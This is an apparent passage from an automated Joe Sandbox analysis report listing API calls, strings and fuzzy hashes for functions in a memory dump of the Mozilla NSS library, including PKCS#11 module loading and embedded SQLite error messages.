PR_NotifyCondVar.NSS3 ref: 6C587273
PR_Unlock.NSS3 ref: 6C587281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C587291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5872B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5872D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5872E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C587372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C6C0148,,defaultModDB,internalKeySlot), ref: 6C5874CC
free.MOZGLUE(00000000), ref: 6C587513
free.MOZGLUE(00000000), ref: 6C58751B
free.MOZGLUE(00000000), ref: 6C587528
free.MOZGLUE(00000000), ref: 6C58753C
free.MOZGLUE(00000000), ref: 6C587550
free.MOZGLUE(00000000), ref: 6C587561
free.MOZGLUE(00000000), ref: 6C587572
free.MOZGLUE(00000000), ref: 6C587583
free.MOZGLUE(00000000), ref: 6C587594
free.MOZGLUE(00000000), ref: 6C5875A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C5875BD
free.MOZGLUE(00000000), ref: 6C5875C8
free.MOZGLUE(00000000), ref: 6C5875F1
PR_NewLock.NSS3 ref: 6C587636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C587686
PR_NewLock.NSS3 ref: 6C5876A2

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C5876B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C587707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C58771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C587731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C58774A
DeleteCriticalSection.KERNEL32(?), ref: 6C587770
free.MOZGLUE(?), ref: 6C587779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5877AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C5877C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5877DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C587821
PORT_Alloc_Util.NSS3(?), ref: 6C587837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C58785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C58786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C5878AC
free.MOZGLUE(00000000), ref: 6C5878BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C5878F3
free.MOZGLUE(00000000), ref: 6C5878FC
free.MOZGLUE(00000000), ref: 6C58791C

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

Strings

dbm:, xrefs: 6C587716
NSS Internal Module, xrefs: 6C5874A2, 6C5874C6
,defaultModDB,internalKeySlot, xrefs: 6C58748D, 6C5874AA
extern:, xrefs: 6C58772B
sql:, xrefs: 6C5876FE
kbi., xrefs: 6C587886
dll, xrefs: 6C58788E
Spac, xrefs: 6C587389
rdb:, xrefs: 6C587744
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C5874C7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: cff96ce26a3fa6bf114264619375af9019879520b12f0ab0a36ceb33f679443f
Instruction ID: 5d204e03b995400c02fac71bab0a98119fd01a10730db81ec066057ffa3920bd
Opcode Fuzzy Hash: cff96ce26a3fa6bf114264619375af9019879520b12f0ab0a36ceb33f679443f
Instruction Fuzzy Hash: ED5226B1E02321EBEF119F65CC457AE7BB4BF06348F144028FD0AA6A51E731E954CBA5

Function 6C5ABFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C5AC0C8

Part of subcall function 6C639440: LeaveCriticalSection.KERNEL32 ref: 6C6395CD
Part of subcall function 6C639440: TlsGetValue.KERNEL32 ref: 6C639622
Part of subcall function 6C639440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C63964E

PR_EnterMonitor.NSS3 ref: 6C5AC0AE

Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C6391AA
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639212
Part of subcall function 6C639090: _PR_MD_WAIT_CV.NSS3 ref: 6C63926B

Part of subcall function 6C560600: GetLastError.KERNEL32(?,?,?,?,?,6C5605E2), ref: 6C560642
Part of subcall function 6C560600: TlsGetValue.KERNEL32(?,?,?,?,?,6C5605E2), ref: 6C56065D
Part of subcall function 6C560600: GetLastError.KERNEL32 ref: 6C560678
Part of subcall function 6C560600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C56068A
Part of subcall function 6C560600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C560693
Part of subcall function 6C560600: PR_SetErrorText.NSS3(00000000,?), ref: 6C56069D
Part of subcall function 6C560600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,2AF198CD,?,?,?,?,?,6C5605E2), ref: 6C5606CA
Part of subcall function 6C560600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C5605E2), ref: 6C5606E6

PR_EnterMonitor.NSS3 ref: 6C5AC0F2
PR_ExitMonitor.NSS3 ref: 6C5AC10E
PR_ExitMonitor.NSS3 ref: 6C5AC081

Part of subcall function 6C639440: TlsGetValue.KERNEL32 ref: 6C63945B
Part of subcall function 6C639440: TlsGetValue.KERNEL32 ref: 6C639479
Part of subcall function 6C639440: EnterCriticalSection.KERNEL32 ref: 6C639495
Part of subcall function 6C639440: TlsGetValue.KERNEL32 ref: 6C6394E4
Part of subcall function 6C639440: TlsGetValue.KERNEL32 ref: 6C639532
Part of subcall function 6C639440: LeaveCriticalSection.KERNEL32 ref: 6C63955D

PR_EnterMonitor.NSS3 ref: 6C5AC068

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

Part of subcall function 6C560600: GetProcAddress.KERNEL32(?,?), ref: 6C560623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C5AC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C5AC183
free.MOZGLUE(00000000), ref: 6C5AC18E
PR_LoadLibrary.NSS3(?), ref: 6C5AC1A3
PR_EnterMonitor.NSS3 ref: 6C5AC1D4
PR_ExitMonitor.NSS3 ref: 6C5AC1F3
PR_CallOnce.NSS3(6C6D2318,6C5ACA70), ref: 6C5AC210
PR_EnterMonitor.NSS3 ref: 6C5AC22B
PR_ExitMonitor.NSS3 ref: 6C5AC247
PR_EnterMonitor.NSS3 ref: 6C5AC26A
PR_ExitMonitor.NSS3 ref: 6C5AC287
PR_UnloadLibrary.NSS3(?), ref: 6C5AC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C5AC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5AC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C5AC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C5AC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C5AC7B5
PR_UnloadLibrary.NSS3(?), ref: 6C5AC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C5AC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5AC8BF
PORT_Alloc_Util.NSS3(?), ref: 6C5AC8D5
free.MOZGLUE(00000000), ref: 6C5AC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5AC9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5AC9E5
free.MOZGLUE(00000000), ref: 6C5ACA5A

Strings

FC_GetFunctionList, xrefs: 6C5AC098
NSC_GetFunctionList, xrefs: 6C5AC093
PKCS 11, xrefs: 6C5AC2F9, 6C5AC314
nss_mod_log, xrefs: 6C5AC3CC
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C5AC38D
NSS_ReturnModuleSpecData, xrefs: 6C5AC275
FC_GetInterface, xrefs: 6C5AC054
NSC_GetInterface, xrefs: 6C5AC04F
NSC_ModuleDBFunc, xrefs: 6C5AC0FC
Vendor NSS FIPS Interface, xrefs: 6C5AC34A
NSS_DISABLE_UNLOAD, xrefs: 6C5AC7B0
NSS_FORCE_TOKEN_LOCK, xrefs: 6C5AC77D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 8e4c5f1c582c28456e30e15797e2a6d993cacae2b396f6ae593ef28cc6683530
Instruction ID: d1f9425cd55eef81bee3e49d4cec294df2afc605ceef939af55051a0aad6edc3
Opcode Fuzzy Hash: 8e4c5f1c582c28456e30e15797e2a6d993cacae2b396f6ae593ef28cc6683530
Instruction Fuzzy Hash: 53428FB1A042049FDB04DF97DC86B5E7BB0FB46308F044029E9169BB21E732E956CF99

Function 6C683FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C683FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C683FFE
malloc.MOZGLUE(-00000003), ref: 6C684016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6BFC62), ref: 6C68404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C68407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6840A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6840D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C684112
malloc.MOZGLUE(00000000), ref: 6C68411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C68414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C684160
free.MOZGLUE(?), ref: 6C68416C
malloc.MOZGLUE(?), ref: 6C6841AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C6841EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C684520), ref: 6C684244
GetEnvironmentStrings.KERNEL32 ref: 6C68424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C684263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C684283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6842B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6842E4
malloc.MOZGLUE(00000002), ref: 6C6842FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C684342
GetStdHandle.KERNEL32(000000F6), ref: 6C6843AB
GetStdHandle.KERNEL32(000000F5), ref: 6C6843B2
GetStdHandle.KERNEL32(000000F4), ref: 6C6843B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C684403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C684410

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C68445E
CloseHandle.KERNEL32(?), ref: 6C68446B
free.MOZGLUE(?), ref: 6C684482
free.MOZGLUE(00000000), ref: 6C684492
free.MOZGLUE(00000000), ref: 6C6844A4
GetLastError.KERNEL32 ref: 6C6844B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C6844BE
free.MOZGLUE(?), ref: 6C6844C7
free.MOZGLUE(00000000), ref: 6C6844D5
free.MOZGLUE(00000000), ref: 6C6844EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6C6841E9
D, xrefs: 6C684396
=, xrefs: 6C6844F8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 0ab2c9301d28f2185fc44c6ffd899df716bd786d265803f8af26918ad6ad2e66
Instruction ID: d122b977f90c7853735e1ed513bc2c35e899f43351650bcaeca4bb3193baaee4
Opcode Fuzzy Hash: 0ab2c9301d28f2185fc44c6ffd899df716bd786d265803f8af26918ad6ad2e66
Instruction Fuzzy Hash: 68021A70E063119FEB10CF69C8947BEBBB8AF16308F244128DD56A7B41D7B1D905CBA9

Function 6C596D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C69A8EC,0000006C), ref: 6C596DC6
memcpy.VCRUNTIME140(?,6C69A958,0000006C), ref: 6C596DDB
memcpy.VCRUNTIME140(?,6C69A9C4,00000078), ref: 6C596DF1
memcpy.VCRUNTIME140(?,6C69AA3C,0000006C), ref: 6C596E06
memcpy.VCRUNTIME140(?,6C69AAA8,00000060), ref: 6C596E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C596E38

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C596E76
TlsGetValue.KERNEL32 ref: 6C59726F
EnterCriticalSection.KERNEL32(?), ref: 6C597283

Strings

!, xrefs: 6C597123

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 56d12c66fdda37c2ce2ae3a4b18a37cb9757726ecaedf58652bf0b6dbf3e6b63
Instruction ID: e17a54e0675fccdd0822ce35e6fe3164705bda278944cf9c0465ebe7bdfb7f15
Opcode Fuzzy Hash: 56d12c66fdda37c2ce2ae3a4b18a37cb9757726ecaedf58652bf0b6dbf3e6b63
Instruction Fuzzy Hash: 43728D75D052599FDF60CF29CC88B9ABBB5AF49304F1441EAD80DA7701EB31AA84CF91

Function 6C503C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C503C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C503D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C503EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C503ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C503F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C504052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C50406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C50410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C50449C

Strings

database corruption, xrefs: 6C504490, 6C5044F4, 6C504599, 6C504764, 6C504804
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C504452, 6C504486, 6C5044EA, 6C504571, 6C504580, 6C50458F, 6C50475A, 6C5047FA
%s at line %d of [%.10s], xrefs: 6C504495, 6C5044F9, 6C50459E, 6C504769, 6C504809

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: dddca33557fc9bc8b0f1a5274cb2ba0ea39752d868cedb0808d25bd6452d96ca
Instruction ID: d51066a673803bc3daa8be409e78434036fb275915082acb68b0015b12b883d4
Opcode Fuzzy Hash: dddca33557fc9bc8b0f1a5274cb2ba0ea39752d868cedb0808d25bd6452d96ca
Instruction Fuzzy Hash: 64829C75B00215DFCB04CF69C880B9AB7B2BF99318F2585A8D905EBB51E731EC42CB95

Function 6C5DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5DACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C5DACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C5DACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C5DAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5DADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DADF0

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5DB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5DB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5DB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C5DB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5DB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5DB40C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 55b674aec0795598df8cfe6ae2a0ca0a98311d92f048506141777930427c13a7
Instruction ID: fc3808c96f4dc72d3815dd7aaee21628c987fbe97b16af5ed3f42588c74798db
Opcode Fuzzy Hash: 55b674aec0795598df8cfe6ae2a0ca0a98311d92f048506141777930427c13a7
Instruction Fuzzy Hash: 7822AF71904301EFE700DF18CC45B9A77E2AF84308F15896CE8595B7A2E772F859CB9A

Function 6C521F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5225F3

Strings

multiple recursive references: %s, xrefs: 6C5222E0
a NATURAL join may not have an ON or USING clause, xrefs: 6C5232C1
recursive reference in a subquery: %s, xrefs: 6C5222E5
%s.%s, xrefs: 6C522D68
H, xrefs: 6C52329F
unsafe use of virtual table "%s", xrefs: 6C5230D1
no such table: %s, xrefs: 6C5226AC
too many references to "%s": max 65535, xrefs: 6C522FB6
access to view "%s" prohibited, xrefs: 6C522F4A
table %s has %d values for %d columns, xrefs: 6C52316C
cannot join using column %s - column not present in both tables, xrefs: 6C5232AB
no such index: "%s", xrefs: 6C52319D
no tables specified, xrefs: 6C5226BE
'%s' is not a function, xrefs: 6C522FD2
H, xrefs: 6C52322D
cannot have both ON and USING clauses in the same join, xrefs: 6C5232B5
%s.%s.%s, xrefs: 6C52302D
too many columns in result set, xrefs: 6C523012

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: f13b2d7b50995e83378c3536f132cdd23d766734c77cf149b1d8a5fe61308a42
Instruction ID: 62c0ef62966dfdb956eecbd5d8221fc8521834b18f8021380276df6741d8742c
Opcode Fuzzy Hash: f13b2d7b50995e83378c3536f132cdd23d766734c77cf149b1d8a5fe61308a42
Instruction Fuzzy Hash: EDD28D78E14209CFDB14CF95CC84B9DB7F1BF89328F288169D855ABB91D739A842CB50

Function 6C55ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C55ED38

